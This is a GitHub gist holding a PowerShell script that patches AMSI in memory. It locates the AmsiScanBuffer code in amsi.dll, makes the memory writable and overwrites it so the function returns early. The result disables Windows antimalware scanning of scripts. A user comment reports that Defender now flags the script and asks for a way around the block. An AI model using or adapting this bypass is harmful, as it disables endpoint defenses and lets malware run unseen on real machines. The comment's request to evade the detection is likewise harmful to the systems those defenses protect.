Created
July 23, 2019 14:25
-
-
Save Hestat/59b86df6ced15021eb3080338959969d to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Write-Host "-- AMSI Patch" | |
| Write-Host "-- Paul Laîné (@am0nsec)" | |
| Write-Host "" | |
| $Kernel32 = @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| public class Kernel32 { | |
| [DllImport("kernel32")] | |
| public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName); | |
| [DllImport("kernel32")] | |
| public static extern IntPtr LoadLibrary(string lpLibFileName); | |
| [DllImport("kernel32")] | |
| public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); | |
| } | |
| "@ | |
| Add-Type $Kernel32 | |
| Class Hunter { | |
| static [IntPtr] FindAddress([IntPtr]$address, [byte[]]$egg) { | |
| while ($true) { | |
| [int]$count = 0 | |
| while ($true) { | |
| [IntPtr]$address = [IntPtr]::Add($address, 1) | |
| If ([System.Runtime.InteropServices.Marshal]::ReadByte($address) -eq $egg.Get($count)) { | |
| $count++ | |
| If ($count -eq $egg.Length) { | |
| return [IntPtr]::Subtract($address, $egg.Length - 1) | |
| } | |
| } Else { break } | |
| } | |
| } | |
| return $address | |
| } | |
| } | |
| [IntPtr]$hModule = [Kernel32]::LoadLibrary("amsi.dll") | |
| Write-Host "[+] AMSI DLL Handle: $hModule" | |
| [IntPtr]$dllCanUnloadNowAddress = [Kernel32]::GetProcAddress($hModule, "DllCanUnloadNow") | |
| Write-Host "[+] DllCanUnloadNow address: $dllCanUnloadNowAddress" | |
| If ([IntPtr]::Size -eq 8) { | |
| Write-Host "[+] 64-bits process" | |
| [byte[]]$egg = [byte[]] ( | |
| 0x4C, 0x8B, 0xDC, # mov r11,rsp | |
| 0x49, 0x89, 0x5B, 0x08, # mov qword ptr [r11+8],rbx | |
| 0x49, 0x89, 0x6B, 0x10, # mov qword ptr [r11+10h],rbp | |
| 0x49, 0x89, 0x73, 0x18, # mov qword ptr [r11+18h],rsi | |
| 0x57, # push rdi | |
| 0x41, 0x56, # push r14 | |
| 0x41, 0x57, # push r15 | |
| 0x48, 0x83, 0xEC, 0x70 # sub rsp,70h | |
| ) | |
| } Else { | |
| Write-Host "[+] 32-bits process" | |
| [byte[]]$egg = [byte[]] ( | |
| 0x8B, 0xFF, # mov edi,edi | |
| 0x55, # push ebp | |
| 0x8B, 0xEC, # mov ebp,esp | |
| 0x83, 0xEC, 0x18, # sub esp,18h | |
| 0x53, # push ebx | |
| 0x56 # push esi | |
| ) | |
| } | |
| [IntPtr]$targetedAddress = [Hunter]::FindAddress($dllCanUnloadNowAddress, $egg) | |
| Write-Host "[+] Targeted address: $targetedAddress" | |
| $oldProtectionBuffer = 0 | |
| [Kernel32]::VirtualProtect($targetedAddress, [uint32]2, 4, [ref]$oldProtectionBuffer) | Out-Null | |
| $patch = [byte[]] ( | |
| 0x31, 0xC0, # xor rax, rax | |
| 0xC3 # ret | |
| ) | |
| [System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $targetedAddress, 3) | |
| $a = 0 | |
| [Kernel32]::VirtualProtect($targetedAddress, [uint32]2, $oldProtectionBuffer, [ref]$a) | Out-Null |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
this script no longer works on the latest Windows 10 machine with Defender on it. Could this be the reason why: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=VirTool%3aPowerShell%2fAmsiTamper&threatid=2147835762 ?
Are you able to work around this new block?